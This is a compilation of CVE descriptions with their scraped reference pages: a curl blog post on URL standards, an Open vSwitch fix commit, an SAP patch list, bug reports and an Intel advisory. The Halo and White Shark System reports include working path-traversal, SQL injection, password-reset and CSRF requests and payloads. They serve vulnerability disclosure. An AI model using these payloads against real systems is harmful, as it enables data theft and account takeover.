mod_auth_openidc is an authentication/authorization module for the Apache 2.x HTTP server that functions as an OpenID Connect Relying Party, authenticating users against an OpenID Connect Provider. In versions prior to 2.4.9, `oidc_validate_redirect_url()` does not parse URLs the same way as most browsers do. As a result, this function can be bypassed and leads to an Open Redirect vulnerability in the logout functionality. This bug has been fixed in version 2.4.9 by replacing any backslash of the URL to redirect with slashes to address a particular breaking change between the different specifications (RFC2396 / RFC3986 and WHATWG). As a workaround, this vulnerability can be mitigated by configuring `mod_auth_openidc` to only allow redirection whose destination matches a given regular expression.

Following up on the problem with our current lack of a universal URL standard that I blogged about in May 2016: My URL isn’t your URL. I want a _single, unified_ URL standard that we would all stand behind, support and adhere to.

What triggers me this time, is yet another issue. A friendly curl user sent me this URL:

http://user@example.com:80@daniel.haxx.se

… and pasting this URL into different tools and browsers show that there’s not a wide agreement on how this should work. Is the URL legal in the first place and if so, which host should a client contact?

*   **curl** treats the ‘@’-character as a separator between userinfo and host name so ‘example.com’ becomes the host name, the port number is 80 followed by rubbish that curl ignores. (wget2, the next-gen wget that’s in development works identically)
*   **wget** extracts the example.com host name but rejects the port number due to the rubbish after the zero.
*   **Edge** and **Safari** say the URL is invalid and don’t go anywhere
*   **Firefox** and **Chrome** allow ‘@’ as part of the userinfo, take the ’80’ as a password and the host name then becomes ‘daniel.haxx.se’

The only somewhat modern “spec” for URLs is the WHATWG URL specification. The other major, but now somewhat aged, URL spec is RFC 3986, made by the IETF and published in 2005.

In 2015, URL problem statement and directions was published as an Internet-draft by Masinter and Ruby and it brings up most of the current URL spec problems. Some of them are also discussed in Ruby’s WHATWG URL vs IETF URI post from 2014.

What I would like to see happen…

**Which group? _A_ group!**

Friends I know in the WHATWG suggest that I should dig in there and help them improve their spec. That would be a good idea if fixing the WHATWG spec would be the ultimate goal. I don’t think it is enough.

The WHATWG is highly browser focused and my interactions with members of that group that I have had in the past, have shown that there is little sympathy there for non-browsers who want to deal with URLs and there is even less sympathy or interest for URL schemes that the popular browsers don’t even support or care about. URLs cover much more than HTTP(S).

I have the feeling that WHATWG people would not like this work to be done within the IETF and vice versa. Since I’d like buy-in from both camps, and any other camps that might have an interest in URLs, this would need to be handled somehow.

It would also be great to get other major URL “consumers” on board, like authors of popular URL parsing libraries, tools and components.

Such a URL group would of course have to agree on the goal and how to get there, but I’ll still provide some additional things I want to see.

**Update**: I want to emphasize that I do not consider the WHATWG’s job bad, wrong or lost. I think they’ve done a great job at unifying browsers’ treatment of URLs. I don’t mean to belittle that. I just _know_ that this group is only a small subset of the people who probably should be involved in a unified URL standard.

**A single fixed spec**

I can’t see any compelling reasons why a URL specification couldn’t reach a stable state and get published as \*the\* URL standard. The “living standard” approach may be fine for certain things (and in particular browsers that update every six weeks), but URLs are supposed to be long-lived and inter-operate far into the future so they really really should not change. Therefore, I think the IETF documentation model could work well for this.

The WHATWG spec documents what browsers do, and browsers do what is documented. At least that’s the theory I’ve been told, and it causes a spinning and never-ending loop that goes against my wish.

**Document the format**

The WHATWG specification is written in a pseudo code style, describing how a parser would “walk” over the string with a state machine and all. I know some people like that, I find it utterly annoying and really hard to figure out what’s allowed or not. I _much_ more prefer the regular RFC style of describing protocol syntax.

**IDNA**

Can we please just say that host names in URLs should be handled according to IDNA2008 (RFC 5895)? WHATWG URL doesn’t state any IDNA spec number at all.

**Move out irrelevant sections**

“Irrelevant” when it comes to documenting the URL format that is. The WHATWG details several things that are related to URL for browsers but are mostly irrelevant to other URL consumers or producers. Like section “5. application/x-www-form-urlencoded” and “6. API”.

They would be better placed in a “URL considerations for browsers” companion document.

**Working doesn’t imply sensible**

So browsers accept URLs written with thousands of forward slashes instead of two. That is not a good reason for the spec to say that a URL may legitimately contain a thousand slashes. I’m totally convinced there’s no critical content anywhere using such formatted URLs and no soul will be sad if we’d restricted the number to a single-digit. So we should. And yeah, then browsers should reject URLs using more.

The slashes are only an example. The browsers have used a “liberal in what you accept” policy for a lot of things since forever, but we must resist to use that as a basis when nailing down a standard.

**The odds of this happening soon?**

I know there are individuals interested in seeing the URL situation getting worked on. We’ve seen articles and internet-drafts posted on the issue several times the last few years. Any year now I think we will see some movement for real trying to fix this. I hope I will manage to participate and contribute a little from my end.

CVE-2021-32786: One URL standard please | daniel.haxx.se

Open vSwitch (aka openvswitch) 2.11.0 through 2.15.0 has a use-after-free in decode_NXAST_RAW_ENCAP (called from ofpact_decode and ofpacts_decode) during the decoding of a RAW_ENCAP action.

**Commit**

Permalink

Browse files

Browse the repository at this point in the history

ofp-actions: Fix use-after-free while decoding RAW\_ENCAP.

While decoding RAW\_ENCAP action, decode\_ed\_prop() might re-allocate
ofpbuf if there is no enough space left.  However, function
'decode\_NXAST\_RAW\_ENCAP' continues to use old pointer to 'encap'
structure leading to write-after-free and incorrect decoding.

  ==3549105==ERROR: AddressSanitizer: heap-use-after-free on address
  0x60600000011a at pc 0x0000005f6cc6 bp 0x7ffc3a2d4410 sp 0x7ffc3a2d4408
  WRITE of size 2 at 0x60600000011a thread T0
    #0 0x5f6cc5 in decode\_NXAST\_RAW\_ENCAP lib/ofp-actions.c:4461:20
    #1 0x5f0551 in ofpact\_decode ./lib/ofp-actions.inc2:4777:16
    #2 0x5ed17c in ofpacts\_decode lib/ofp-actions.c:7752:21
    #3 0x5eba9a in ofpacts\_pull\_openflow\_actions\_\_ lib/ofp-actions.c:7791:13
    #4 0x5eb9fc in ofpacts\_pull\_openflow\_actions lib/ofp-actions.c:7835:12
    #5 0x64bb8b in ofputil\_decode\_packet\_out lib/ofp-packet.c:1113:17
    #6 0x65b6f4 in ofp\_print\_packet\_out lib/ofp-print.c:148:13
    #7 0x659e3f in ofp\_to\_string\_\_ lib/ofp-print.c:1029:16
    #8 0x659b24 in ofp\_to\_string lib/ofp-print.c:1244:21
    #9 0x65a28c in ofp\_print lib/ofp-print.c:1288:28
    #10 0x540d11 in ofctl\_ofp\_parse utilities/ovs-ofctl.c:2814:9
    #11 0x564228 in ovs\_cmdl\_run\_command\_\_ lib/command-line.c:247:17
    #12 0x56408a in ovs\_cmdl\_run\_command lib/command-line.c:278:5
    #13 0x5391ae in main utilities/ovs-ofctl.c:179:9
    #14 0x7f6911ce9081 in \_\_libc\_start\_main (/lib64/libc.so.6+0x27081)
    #15 0x461fed in \_start (utilities/ovs-ofctl+0x461fed)

Fix that by getting a new pointer before using.

Credit to OSS-Fuzz.

Fuzzer regression test will fail only with AddressSanitizer enabled.

Reported-at: https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=27851
Fixes: f839892 ("OF support and translation of generic encap and decap")
Acked-by: William Tu <u9012063@gmail.com>
Signed-off-by: Ilya Maximets <i.maximets@ovn.org>

*   Loading branch information

CVE-2021-36980: ofp-actions: Fix use-after-free while decoding RAW_ENCAP. · openvswitch/ovs@77cccc7

SAP NetWeaver AS for Java (Http Service Monitoring Filter), versions - 7.10, 7.11, 7.20, 7.30, 7.31, 7.40, 7.50, allows an attacker to send multiple HTTP requests with different method types thereby crashing the filter and making the HTTP server unavailable to other legitimate users leading to denial of service vulnerability.

_This post by SAP Product Security Response Team shares information on Patch Day Security Notes\* that are released on second Tuesday of every month and fix vulnerabilities discovered in SAP products. SAP strongly recommends that the customer visits the_ _Support Portal_ _and applies patches on a priority to protect their SAP landscape._

On 13th of July 2021, SAP Security Patch Day saw the release of 12 Security Notes. There were 3 updates to previously released Patch Day Security Notes.

List of security notes released on July Patch Day:

**Note#**

**Title**

**Priority**

**CVSS**

2622660

_**Update to Security Note released on August 2018 Patch Day:**_  
**Security updates for the browser control Google Chromium delivered with SAP Business Client**Product - SAP Business Client, Version - 6.5

Hot News

10

3007182

_**Update to Security Note released on June 2021 Patch Day:**_\[CVE-2021-27610\] **Improper Authentication in SAP NetWeaver ABAP Server and ABAP Platform**  
Product - SAP NetWeaver AS ABAP and ABAP Platform, Versions - 700,701,702,731,740,750,751,752,753,754,755,804  

Hot News

9

3059446

\[CVE-2021-33671\] **Missing Authorization check in SAP NetWeaver Guided Procedures**  
Product - SAP NetWeaver Guided Procedures (Administration Workset), Versions - 7.10, 7.20, 7.30, 7.31, 7.40, 7.50

High

7.6

3056652

\[CVE-2021-33670\] **Denial of Service (DoS) in SAP NetWeaver AS for Java (Http Service)**  
Product - SAP NetWeaver AS for Java (Http Service), Versions - 7.10, 7.11, 7.20, 7.30, 7.31, 7.40, 7.50

High

7.5

3066316

\[CVE-2021-33676\] **Missing authorization check in SAP CRM ABAP**  
Product - SAP CRM, Versions - 700, 701, 702, 712, 713, 714

Medium

6.8

3036436

_**Update to Security Note released on April 2021 Patch Day:**_\[CVE-2021-27604\] **Potential XXE Vulnerability in SAP Process Integration (ESR Java Mappings)**  
Product - SAP Process Integration (Enterprise Service Repository JAVA Mappings), Versions - 7.10, 7.20, 7.30, 7.31, 7.40, 7.50 

Medium

6.5

3044754

\[CVE-2021-33677\] **Information Disclosure in SAP NetWeaver AS ABAP and ABAP Platform**  
Product - SAP NetWeaver AS ABAP and ABAP Platform, Versions - 700, 702, 730, 731, 804, 740, 750, 784, DEV

Medium

6.5

3048657

\[CVE-2021-33678\] **Code Injection vulnerability in SAP NetWeaver AS ABAP (Reconciliation Framework)**  
Product - SAP NetWeaver AS ABAP (Reconciliation Framework), Versions - 700, 701, 702, 710, 711, 730, 731, 740, 750, 751, 752, 75A, 75B, 75B, 75C, 75D, 75E, 75F

Medium

6.5

3053403

\[CVE-2021-33682\] **Cross-Site Scripting (XSS) vulnerability in SAP Lumira Server**  
Product - SAP Lumira Server, Version - 2.4

Medium

5.4

3000663

\[CVE-2021-33683\] **HTTP Request Smuggling in SAP Web Dispatcher and Internet Communication Manager**  
Product - SAP Web Dispatcher and Internet Communication Manager, Versions - KRNL32NUC 7.21, 7.21EXT, 7.22, 7.22EXT, KRNL32UC 7.21, 7.21EXT, 7.22, 7.22EXT, KRNL64NUC 7.21, 7.21EXT, 7.22, 7.22EXT, 7.49, KRNL64UC 7.21, 7.21EXT, 7.22, 7.22EXT, 7.49, 7.53, 7.73, WEBDISP 7.53, 7.73, 7.77, 7.81, 7.82, 7.83, KERNEL 7.21, 7.22, 7.49, 7.53, 7.73, 7.77, 7.81, 7.82, 7.83

Medium

5.4

3032624

\[CVE-2021-33684\] **Memory Corruption in SAP NetWeaver AS ABAP and ABAP Platform**  
Product - SAP NetWeaver AS ABAP and ABAP Platform, Versions - KRNL32NUC 7.21, 7.21EXT, 7.22, 7.22EXT, KRNL32UC 7.21, 7.21EXT, 7.22, 7.22EXT, KRNL64NUC 7.21, 7.21EXT, 7.22, 7.22EXT, 7.49, KRNL64UC 8.04, 7.21, 7.21EXT, 7.22, 7.22EXT, 7.49, 7.53, KERNEL 8.04, 7.21, 7.21EXT, 7.22, 7.22EXT, 7.49, 7.53, 7.77, 7.81, 7.84

Medium

5.3

3059764

\[CVE-2021-33687\] **Information Disclosure in SAP NetWeaver AS for Java (Enterprise Portal)**  
Product - SAP NetWeaver AS JAVA (Enterprise Portal), Versions - 7.10, 7.20, 7.30, 7.31, 7.40, 7.50

Medium

4.5

3044751

\[CVE-2021-33667\] **Information Disclosure in SAP Business Objects Web Intelligence (BI Launchpad)**  
Product - SAP Business Objects Web Intelligence (BI Launchpad), Versions - 420, 430

Medium

4.3

3067890

\[Multiple CVEs\] **Improper Input Validation in SAP 3D Visual Enterprise Viewer**  
CVEs - CVE-2021-33681, CVE-2021-33680  
Product - SAP 3D Visual Enterprise Viewer, Version - 9.0

Medium

4.3

3038594

\[CVE-2021-33689\] **Insufficient Logging in SAP NetWeaver AS for JAVA (Administrator)**  
Product - SAP NetWeaver AS JAVA (Administrator applications), Version - 7.50

Low

3.5

, \_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_

**Vulnerability Type Distribution** **-  July 2021**

_#Multiple vulnerabilities on same product can be fixed by one security note._ 

  
**Security Notes vs Priority Distribution (February – July 2021)\*\***

_\*_ _Patch Day Security Notes are all notes that appear under the category of “Patch Day Notes” in_ _SAP Support Portal_

_\*\* Any Patch Day Security Note released after the second Tuesday, will be accounted for in the following SAP Security Patch Day._

Customers who would like to take a look at all Security Notes published or updated after June 8, 2021, go to Launchpad Expert Search → Filter 'SAP Security Notes' released between 'June 9, 2021 - July 13, 2021' → Go.

To know more about the security researchers and research companies who have contributed for security patches of this month, visit SAP Product Security Response Acknowledgement Page.

Do write to us at secure@sap.com with all your comments and feedback on this blog post.

SAP Product Security Response Team

CVE-2021-33670: SAP Security Patch Day – July 2021 - Product Security Response at SAP

File Deletion vulnerability in Halo 0.4.3 via delBackup.

**我确定我已经查看了** (标注[ ]为[x])

*   Halo 使用文档
*   Github Wiki 常见问题
*   其他 Issues

**我要申请** (标注[ ]为[x])

*   BUG 反馈
*   添加新的特性或者功能
*   请求技术支持

There is an arbitrary file deletion vulnerability in the backup file deletion.

    @GetMapping(value = "delBackup")
        @ResponseBody
        public JsonResult delBackup(@RequestParam("fileName") String fileName,
                                    @RequestParam("type") String type) {
            final String srcPath = System.getProperties().getProperty("user.home") + "/halo/backup/" + type + "/" + fileName;
            try {
                FileUtil.del(srcPath);
                return new JsonResult(ResultCodeEnum.SUCCESS.getCode(), localeMessageUtil.getMessage("code.admin.common.delete-success"));
            } catch (Exception e) {
                return new JsonResult(ResultCodeEnum.FAIL.getCode(), localeMessageUtil.getMessage("code.admin.common.delete-failed"));
            }
        }
    

eg.

    GET /admin/backup/delBackup?type=posts&fileName=../../upload/2019/3/veer-15238236420190404102850332.jpg HTTP/1.1
    Host: demo.halo.run
    Connection: close
    Accept: application/json, text/javascript, */*; q=0.01
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36
    Referer: https://demo.halo.run/admin/backup?type=posts
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: JSESSIONID=jLIF44HA_8IHwVFhq66-jAArsdL3Mtz_tg2GvNhO
    

  
The vulnerability discoverer by Chaitin Tech.

CVE-2020-19038: Any file deletion in the background · Issue #136 · halo-dev/halo

HTSlib through 1.10.2 allows out-of-bounds write access in vcf_parse_format (called from vcf_parse and vcf_read).

id: OSV-2020-955

summary: UNKNOWN WRITE in vcf\_parse\_format

details: |

OSS-Fuzz report: https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=24097

\`\`\`

Crash type: UNKNOWN WRITE

Crash state:

vcf\_parse\_format

vcf\_parse

vcf\_read

\`\`\`

modified: '2022-04-13T03:04:32.290566Z'

published: '2020-07-22T00:00:25.417163Z'

references:

\- type: REPORT

url: https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=24097

affected:

\- package:

name: htslib

ecosystem: OSS-Fuzz

ranges:

\- type: GIT

repo: https://github.com/samtools/htslib.git

events:

\- introduced: dd6f0b72c92591252bb77818663629cc1a129949

\- fixed: dcd4b7304941a8832fba2d0fc4c1e716e7a4e72c

versions:

\- '1.10'

\- 1.10.1

\- 1.10.2

ecosystem\_specific:

severity: HIGH

introduced\_range: unknown:dd6f0b72c92591252bb77818663629cc1a129949

CVE-2020-36403: oss-fuzz-vulns/OSV-2020-955.yaml at main · google/oss-fuzz-vulns

PHPGurukul Hospital Management System in PHP v4.0 has a SQL injection vulnerability in \hms\check_availability.php. Remote unauthenticated users can exploit the vulnerability to obtain database sensitive information.

CVE-2020-22164: GitHub - itodaro/PHPGurukul_Hospital_Management_System4.0_cve

White Shark System (WSS) 1.3.2 is vulnerable to sensitive information disclosure via default_task_add.php, remote attackers can exploit the vulnerability to create a task.

###White Shark System(wss) Multiple Vulnerability

####General description：

White Shark System(wss) is a browser-based collaborative office platform that integrates "project management", "task management", "work management" and "work log management".

**\[1\]White Shark System(wss) 1.3.2 has a SQL injection vulnerability. The vulnerability stems from the control\_task.php, control\_project.php, default\_user.php files failing to filter the sort parameter, remote attackers can exploit the vulnerability to obtain database sensitive information.**

**\[2\]White Shark System(wss) 1.3.2 has a SQL injection vulnerability. The vulnerability stems from the default\_task\_edituser.php files failing to filter the csa\_to\_user parameter, remote attackers can exploit the vulnerability to obtain database sensitive information.**

**\[3\]White Shark System(wss) 1.3.2 has a SQL injection vulnerability. The vulnerability stems from the log\_edit.php files failing to filter the csa\_to\_user parameter, remote attackers can exploit the vulnerability to obtain database sensitive information.**

**\[4\]White Shark System(wss) 1.3.2 has an unauthorized access vulnerability,remote attackers can modify the password of any user.**

**\[5\]White Shark System(wss) 1.3.2 has a cross-site request forgery vulnerability,remote attackers can use the user\_edit\_password.php file to modify the user password.**

**\[6\]White Shark System(wss) 1.3.2 has an unauthorized access vulnerability,remote attackers can exploit this vulnerability to escalate to admin privileges.**

**\[7\]White Shark System(wss) 1.3.2 has a sensitive information disclosure vulnerability,remote attackers can obtain username information for all users of the current site.**

**\[8\]White Shark System(wss) 1.3.2 has a sensitive information disclosure vulnerability,remote attackers can exploit the vulnerability to create a task.**

**\[9\]White Shark System(wss) 1.3.2 has web site physical path leakage vulnerability.**

\*\*Environment: \*\* apache/php 7.0.12/White Shark System(wss) 1.3.2

**\[1\]SQL Injection Vulnerability**

The vulnerable file is control\_task.php. (control\_project.php, default\_user.php)

In the control\_task.php file:

On line 150, if the user submits the sort parameter, it is assigned to $sortlist.

On line 284, the GetSQLValueString function is called to process $sortlist and assign it to $query_Recordset1.

 In the GetSQLValueString function of function.class.php, when theType is defined, it will return the value without processing.

Go back to the control\_task.php file:  Line 289 data directly enters the database query,the injection vulnerability was caused by not filtering the data.

Request the following url:/index.php?sort=1,extractvalue(rand(),concat(0x3a,substring(user(),1,30)))%23 

The current user is obtained by injection as root@localhost.

**\[2\]SQL Injection Vulnerability**

The vulnerable file is default\_task\_edituser.php.

The system can filter requests by default only after calling the GetSQLValueString function.

In the default\_task\_edituser.php file:

Line 5 restricts the user to one of "Guest" / "Ordinary User" / "Project Manager" / "Administrator".

Line 20 directly puts $_POST['csa_to_user'] into the database for query, resulting in injection.

Initiate a POST request to submit the following data:

    POST /default_task_edituser.php HTTP/1.1
    Host: 127.0.0.1:8002
    Connection: keep-alive
    Content-Length: 79
    Pragma: no-cache
    Cache-Control: no-cache
    Origin: http://127.0.0.1:8002
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.104 Safari/537.36 Core/1.53.4295.400 QQBrowser/9.7.12661.400
    Content-Type: application/x-www-form-urlencoded
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Referer: http://127.0.0.1:8002/default_user_edit.php?UID=2
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.8
    Cookie: PHPSESSID=dob1mc5scckdktqjp6bif5dh64; csd=19
    
    csa_to_user=1' and 1=(updatexml(1,concat(0x5e24,(select @@version),0x5e24),1))#
    

The current database version obtained by injection is 5.5.53:

**\[3\]SQL Injection Vulnerability**

The vulnerable file is log\_edit.php.

In log\_edit.php:

Line 5 restricts the user to one of "Guest" / "Ordinary User" / "Project Manager" / "Administrator".

On line 58, $logdate enters the database query without being processed by the GetSQLValueString function, resulting in injection.

Request the following url: /log_edit.php?date=1234/**/and/**/1=(updatexml(1,concat(0x5e24,(select%20@@version),0x5e24),1))--%20-&taskid= 1

The current database version obtained by injection is 5.5.53.

**\[4\]Unauthorized Access Vulnerability**

In user\_edit\_password.php:

On line 24, the password is modified for the specified user by $_POST['ID'] and the original password is not verified. So you can override the password of someone else.

After logging in, send the following data:

    POST /user_edit_password.php HTTP/1.1
    Host: 127.0.0.1:8002
    Connection: keep-alive
    Content-Length: 69
    Pragma: no-cache
    Cache-Control: no-cache
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.104 Safari/537.36 Core/1.53.4295.400 QQBrowser/9.7.12661.400
    Content-Type: application/x-www-form-urlencoded
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Referer: http://127.0.0.1:8002/user_edit_password.php?UID=2
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.8
    Cookie: PHPSESSID=dob1mc5scckdktqjp6bif5dh64; csd=21
    
    tk_user_pass=a121314156&tk_user_pass2=a121314156&MM_update=form1&ID=1
    

The admin's password will be modified to a121314156.

**\[5\]CSRF Vulnerability**

Save the following as change.html:

    <html>
      
      <body>
      <script>history.pushState('', '', '/')</script>
        <form action="http://127.0.0.1:8002/user_edit_password.php?UID=1" method="POST">
          <input type="hidden" name="tk_user_pass" value="a1111111" />
          <input type="hidden" name="tk_user_pass2" value="a1111111" />
          <input type="hidden" name="MM_update" value="form1" />
          <input type="hidden" name="ID" value="1" />
        </form>
    	<script>document.forms[0].submit();</script>
      </body>
    </html>
    

After the admin accesses the page, the admin's password will be modified to a1111111. If you want to modify someone else's password, modify the corresponding UID parameter.

**\[6\]Unauthorized Access Vulnerability**

In default\_user\_edit.php

Line 23 If the queried user uid does not match the current id or is not an admin, the operation is quit, and the user is prohibited from viewing other user details.

However, when the user's data update is performed on line 58, the user uid of the data to be updated is directly obtained from $_POST['ID'], so that the information of others can be modified.

POST requests the following data:

    POST /default_user_edit.php?UID=2 HTTP/1.1
    Host: 127.0.0.1:8002
    Connection: keep-alive
    Content-Length: 179
    Pragma: no-cache
    Cache-Control: no-cache
    Origin: http://127.0.0.1:8002
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.104 Safari/537.36 Core/1.53.4295.400 QQBrowser/9.7.12661.400
    Content-Type: application/x-www-form-urlencoded
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Referer: http://127.0.0.1:8002/default_user_edit.php?UID=2
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.8
    Cookie: PHPSESSID=dob1mc5scckdktqjp6bif5dh64; csd=19
    
    tk_display_name=changed_by_todaro&tk_user_contact=18010101010&tk_user_email=12%40qq.com&tk_user_remark=aaaaaaaaaaaaaaaaaa&tk_user_rank=3&submit=%E4%BF%9D%E5%AD%98&MM_update=form1&ID=1
    

You can modify the information of the admin user.

At the same time, you can upgrade the current user to the admin by modifying tk\_user\_rank to 5 when you modify your own information!

    POST /default_user_edit.php?UID=2 HTTP/1.1
    Host: 127.0.0.1:8002
    Connection: keep-alive
    Content-Length: 183
    Pragma: no-cache
    Cache-Control: no-cache
    Origin: http://127.0.0.1:8002
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.104 Safari/537.36 Core/1.53.4295.400 QQBrowser/9.7.12661.400
    Content-Type: application/x-www-form-urlencoded
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Referer: http://127.0.0.1:8002/default_user_edit.php?UID=2
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.8
    Cookie: PHPSESSID=dob1mc5scckdktqjp6bif5dh64; csd=19
    
    tk_display_name=todaro&tk_user_contact=18010101010&tk_user_email=12%40qq.com&tk_user_remark=aaaaaaaaaaaaaaaaaa&tk_user_rank=5&submit=%E4%BF%9D%E5%AD%98&MM_update=form1&ID=2
    

**\[7\]Sensitive Information Disclosure Vulnerability**

The if\_get\_addbook.php file does not have an authentication operation.

Line 3 reads all the input via php://input; Line 4 decodes the json data; Line 7 checks the token value in json with the check\_token function.

The check\_token function is in /function.class.php:

By default, all users have a token of 0.

So the check\_token function returns the uid of the user whose token is 0, which is the uid of all users by default.

Go back to if\_get\_addbook.php:

Line 11 calls the get\_user\_select function in function.class.php.

POST requests the following data:

    POST /if_get_addbook.php HTTP/1.1
    Host: 127.0.0.1:8002
    Connection: keep-alive
    Content-Length: 11
    Pragma: no-cache
    Cache-Control: no-cache
    Origin: http://127.0.0.1:8002
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.104 Safari/537.36 Core/1.53.4295.400 QQBrowser/9.7.12661.400
    Content-Type: application/x-www-form-urlencoded
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Referer: http://127.0.0.1:8002/default_user_edit.php?UID=2
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.8
    Cookie:
    
    {"token":0}
    

Return information for all users:

**\[8\]Unauthorized Access Vulnerability**

The default\_task\_add.php file specifies the dispatcher by $_POST[‘csa_create_user’] when assigning the task, and $_POST[‘csa_create_user’] = 1 can forge the task for the admin user.

POST requests the following data:

    POST /default_task_add.php?projectID=1&UID=-1&touser=-1 HTTP/1.1
    Host: 127.0.0.1:8002
    Connection: keep-alive
    Content-Length: 313
    Pragma: no-cache
    Cache-Control: no-cache
    Origin: http://127.0.0.1:8002
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.104 Safari/537.36 Core/1.53.4295.400 QQBrowser/9.7.12661.400
    Content-Type: application/x-www-form-urlencoded
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Referer: http://127.0.0.1:8002/default_task_add.php?projectID=1&UID=-1&touser=-1
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.8
    Cookie: PHPSESSID=dob1mc5scckdktqjp6bif5dh64; csd=1
    
    csa_text=test_admin_create_project_by_todaro&csa_remark1=hhhh&csa_tag=ccccccc&csa_type=20&csa_to_dept=0001&csa_to_user=2&csa_from_dept=0001&csa_from_user=2&csa_create_user=1&csa_last_user=2&plan_start=2018-08-27&plan_end=2018-08-28&plan_hour=&csa_priority=3&csa_temp=3&csa_remark2=2&cont=ffff&MM_insert=form1
    

Created a task for admin through exploits.

**\[9\]**

/control\_file.php

/control\_log.php

/control\_project.php

/control\_task.php

/control\_log.php

/tree.php

/control\_task.php

CVE-2020-20467: GitHub - itodaro/WhiteSharkSystem_cve

Observable response discrepancy in some Intel(R) Processors may allow an authorized user to potentially enable information disclosure via local access.

**Select Your Region**

The browser version you are using is not recommended for this site.  
Please consider upgrading to the latest version of your browser by clicking one of the following links.

*   Safari
*   Chrome
*   Edge
*   Firefox

**Intel® Processors Software Developer Guidance Advisory**

**Summary: **

Potential security vulnerabilities in some Intel® Processors may allow information disclosure.  Intel is releasing updated software developer prescriptive guidance to address these potential vulnerabilities.

**Vulnerability Details:**

CVEID:  CVE-2021-0086

Description: Observable response discrepancy in floating-point operations for some Intel(R) Processors may allow an authorized user to potentially enable information disclosure via local access.

CVSS Base Score: 6.5 Medium

CVSS Vector:  CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N

CVEID: CVE-2021-0089

Description: Observable response discrepancy in some Intel(R) Processors may allow an authorized user to potentially enable information disclosure via local access.

CVSS Base Score: 6.5 Medium

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N

**Affected Products:**

All Intel® Processor families.

**Recommendations:**

For CVE-2021-0086  Intel recommends that affected software including web browser JavaScript engine that runs on Intel® Processors follow one of the below guidelines: 

•       Process isolation.

•       Use alternatives to NaN-boxing techniques (eg. Dedicated type tag).

•       Constraining FP results before potential type-confused usage.

Additional technical details can be found here.

For CVE-2021-0089 Intel recommends that affected software that runs on Intel® Processors follow one of the below guidelines:

•       Process isolation.

•       Place serializing operations between code gen and execution.

•       Place LFENCE-semantic operations between code gen and execution.

•       Options include LFENCE, SYSCALL/SYSRET

Additional technical details can be found here.

**Acknowledgements:**

Intel would like to thank Enrico Barberis, Hany Ragab, Herbert Bos, and Cristiano Giuffrida from the VUSec group at VU Amsterdam for reporting these issues.

Intel, and nearly the entire technology industry, follows a disclosure practice called Coordinated Disclosure, under which a cybersecurity vulnerability is generally publicly disclosed only after mitigations are available.

**Revision History**

Revision

Date

Description

1.0

06/08/2021

Initial Release

**Legal Notices and Disclaimers**

Intel provides these materials as-is, with no express or implied warranties.

All products, dates, and figures specified are preliminary based on current expectations, and are subject to change without notice.

Intel, processors, chipsets, and desktop boards may contain design defects or errors known as errata, which may cause the product to deviate from published specifications. Current characterized errata are available on request.

Intel technologies’ features and benefits depend on system configuration and may require enabled hardware, software or service activation. Performance varies depending on system configuration. No product or component can be absolutely secure. Check with your system manufacturer or retailer or learn more at https://intel.com.

Some results have been estimated or simulated using internal Intel analysis or architecture simulation or modeling, and provided to you for informational purposes. Any differences in your system hardware, software or configuration may affect your actual performance.

Intel and the Intel logo are trademarks of Intel Corporation in the United States and other countries.

\*Other names and brands may be claimed as the property of others.  
Copyright © Intel Corporation 2022

**Report a Vulnerability**

If you have information about a security issue or vulnerability with an **Intel branded product or technology**, please send an e-mail to secure@intel.com. Encrypt sensitive information using our PGP public key.

Please provide as much information as possible, including:

*   The products and versions affected
*   Detailed description of the vulnerability
*   Information on known exploits

A member of the Intel Product Security Team will review your e-mail and contact you to collaborate on resolving the issue. For more information on how Intel works to resolve security issues, see:

*   Vulnerability handling guidelines

